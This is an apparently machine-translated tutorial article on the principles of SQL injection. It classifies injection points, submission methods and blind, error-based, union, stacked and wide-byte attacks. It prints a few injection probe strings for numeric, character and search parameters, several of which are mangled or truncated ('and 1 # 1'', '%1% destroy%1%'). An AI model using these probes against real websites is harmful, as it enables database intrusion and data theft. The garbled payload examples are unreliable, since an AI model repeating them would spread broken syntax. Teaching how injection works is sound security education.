Shulou(Shulou.com)05/31 Report--

This article mainly introduces the principle of sql injection, has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, the following let the editor take you to understand it.

1. First, understand the principle of SQL injection:

SQL Injection: by inserting the SQL command into the Web form to submit or enter the query string of the domain name or page request, the server is eventually deceived into executing malicious SQL commands.

Specifically, it is the use of existing applications, the ability to inject (malicious) SQL commands into the background database engine execution, it can be input in the Web form (malicious) SQL statements to get a security vulnerability on the site of the database, rather than in accordance with the intention of the designer to execute SQL statements. For example, many previous film and television websites leaked VIP member passwords mostly by submitting query characters through WEB forms, which are particularly vulnerable to SQL injection attacks. (from Baidu)

That is to say, the website page contains the part that interacts with the database (such as the search function of the news website), and when the data information is entered in the website, and the data information is programed and passed into the database for execution, the developers of the website do not safely handle the corresponding data passed into the database (such as filtering special characters, coding, etc.). As a result, hackers can pass malicious code (that is, SQL commands containing illegal SQL statements) into the database through the front segment of the website, and execute these SQL statements for the purpose of hackers in the database, resulting in database information leakage, damage and other consequences.

2. General classification of SQL injection

Classify according to injection point type

(1) Digital injection point

Many web links have a similar structure http://www.example.com/12.php?id=1 based on this form of injection, which is generally called digital injection point. The reason is that its injection point id type is numeric. In most web pages, such as viewing users' personal information, viewing articles, etc., most of them will use this form of structure to transmit id and other information to the back end to query the corresponding information in the database. Return to the front desk. The prototype of this kind of SQL statement is probably select * from table name where id=1. If there is injection, we can construct an injection statement similar to the following sql injection statement to burst: select * from table name where id=1 and 1

(2) character injection point

Web page links have a similar structure http://xwww.example.com/users.php?user=admin this form, its injection point user type is a character type, so it is called character injection point. The prototype of this type of SQL statement is probably the select * from table name where user='admin'. It is worth noting that there are more quotation marks than the numeric injection type sql statement prototype, which can be single or double quotation marks. If there is an injection, we can construct a sql injection statement similar to the following: select * from table name where user='admin' and 1 # 1'We need to get rid of these annoying quotes.

(3) search type injection point

This is a special type of injection. This kind of injection mainly means that the search parameters are not filtered during the data search, generally, there are "keyword= keywords" in the link address and some are not displayed in the link address, but are submitted directly through the search box form. The prototype of the SQL statement submitted by this kind of injection point is roughly as follows: select * from table name where field like'% keyword%'if there is injection, we can construct a similar sql injection statement to explode: select * from table name where field like'% test% 'and'% 1% destroy% 1%

3. If you can judge whether there is SQL injection (rookie summary, for reference only)

To put it simply:

All inputs may trigger SQL injection as long as they interact with the database.

SQL injection can be divided into:

(1) GET injection: the method of submitting data is GET, and the location of the injection point is in the GET parameter section. For example, there is such a link http://xxx.com/news.php?id=1, id is the injection point.

(2) POST injection: the data is submitted by POST, and the injection point is located in the POST data part, which often occurs in the form.

(3) Cookie injection: the Cookie of the client is brought with the HTTP request, and the injection point is stored in a field in Cookie.

(4) HTTP header injection: the injection point is in a field in the header of the HTTP request. For example, it exists in the User-Agent field. Strictly speaking, Cookie is actually a form of head injection. Because Cookie is a field in the header when HTTP requests.

After sorting according to the submission method, you will find that the longest occurrence of SQL injection is in the link address, data parameters, cookie information, and HTTP request headers.

Knowing where there may be SQL injection, we need to determine whether SQL injection can be triggered at those locations. The easiest way is to type and 1 injection (and the transformation of and 1 injection) at the corresponding location. Appropriate single quotation marks are required for different injection point types, such as character types, but not for numeric injection points.

4. Advanced classification of SQL injection (classified by execution effect)

(1) blind note based on Boolean: that is, the injection of true or false conditions can be judged according to the returned page.

(2) time-based blind note: that is, you can not judge any information according to the content returned by the page, and use conditional statements to check whether the time delay statement is executed (that is, whether the page return time is increased).

(3) based on error injection: that is, the page will return an error message, or the result of the injected statement will be returned directly to the page.

(4) Federated query injection: union injection can be used.

(5) Heap query injection: multiple statements can be injected at the same time.

(6) wide byte injection: gbk is a multi-byte code, and two bytes represent one Chinese character.

Thank you for reading this article carefully. I hope the article "what is the principle of sql injection" shared by the editor will be helpful to you. At the same time, I also hope you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.